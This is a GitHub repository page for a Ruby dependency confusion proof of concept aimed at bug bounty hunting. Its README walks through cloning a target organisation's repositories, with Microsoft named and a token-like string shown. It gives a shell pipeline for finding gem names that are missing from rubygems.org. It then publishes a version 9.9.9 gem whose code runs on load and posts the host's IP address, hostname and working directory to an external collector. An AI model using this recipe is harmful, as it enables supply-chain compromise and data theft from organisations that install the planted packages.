Skip to content
/ ruby_dependency_confusion_attacks Public

Ruby package dependency confusion vulnerability POC. Impact this vulnerability is Remote code execution (RCE)

4 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

techghoshal/ruby_dependency_confusion_attacks

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

32 Commits
bin
bin
 
 
lib
lib
 
 
sig
sig
 
 
CHANGELOG.md
CHANGELOG.md
 
 
Gemfile
Gemfile
 
 
README.md
README.md
 
 
Rakefile
Rakefile
 
 
mygem-9.9.9.gem
mygem-9.9.9.gem
 
 
mygem.gemspec
mygem.gemspec
 
 

Repository files navigation

Ruby Dependency Confusion Attacks POC

Twitter Follow

How to Finds & How to Exploit

Finds Gemfile then check the all require here is public or not

https://rubygems.org/gems/

Download all target github repository

$ ghorg clone <target> -t <token>

example: $ ghorg clone microsoft -t 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

  • After Download all repository finds vulnerable ruby package
$ find . -type f -name Gemfile | xargs -n1 -I{} cat {} | awk '/gem / {print}' | awk '{print $2;}' | tr -d '"' | tr -d ",'" | sort -u | xargs -n1 -I{} echo "https://rubygems.org/gems/{}" | httpx -status-code -silent -content-length -mc 404

  • 404 code means this package not available publicly, so this the vulnerable to dependencies confusion attack.

  • Then must be cross checking using github dorking - org:microsoft package_name

  • So now Publish this ruby packages publicly (https://rubygems.org)

$ bundle gem <package_name>
  • Everything set default
$ cd <package_name>
$ nano <package_name>.gem

  • Replaced -

    Gem::Specification.new do |s|
  s.name        = "<package_name>"
  s.version     = "9.9.9"
  s.summary     = "Vulnerability Disclosure: Dependency confiuse vulnerability"
  s.description = "This Ruby package vulnerable to dependency confiuse vulnerability"
  s.authors     = ["<Anindya Ghoshal>"]
  s.email       = "<techghoshal@gmail.com>"
  s.files       = ["lib/<package_name>.rb"]
  s.homepage    =
    "https://rubygems.org/gems/<package_name>"
  s.license       = "MIT"
end

  • Save this file

$ cd lib

  • Replaced -

    module <myGem>

    require 'json'
    require 'net/http'
    require 'socket'

    #Private IP
    privip = UDPSocket.open {|s| s.connect("64.233.187.99", 1); s.addr.last}
    #Hostname
    hostname = Socket.gethostname
    #Current directory
    dir = Dir.pwd

    #Pubcli bin url:- https://pipedream.com  OR  burpCollaborate url
    uri = URI('https://<pipedream.net>')
    req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')

    req.body = {
      private_ip: privip,
      hostname: hostname,
      current_directory: dir
    }.to_json

    Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme == 'https') do |http|
      http.request(req)
    end

end

  • Save this file

$ cd ..
$ gem build <package_name>.gemspec
$ gem push <package_name>-9.9.9.gem
  • Enter your Email: <email>
  • Enter your username: <username>
  • Enter your password: <password>

Upload IS DONE 😎

Connect me

If you have any queries, you can always contact me on twitter(@techghoshal)

About

Ruby package dependency confusion vulnerability POC. Impact this vulnerability is Remote code execution (RCE)

Topics

ruby dependency-injection poc bugbounty bugbountytips dependency-confusion-vulnerability ruby-package-dependency-confusion-attack easy-rce

Resources

Readme
Activity

Stars

4 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages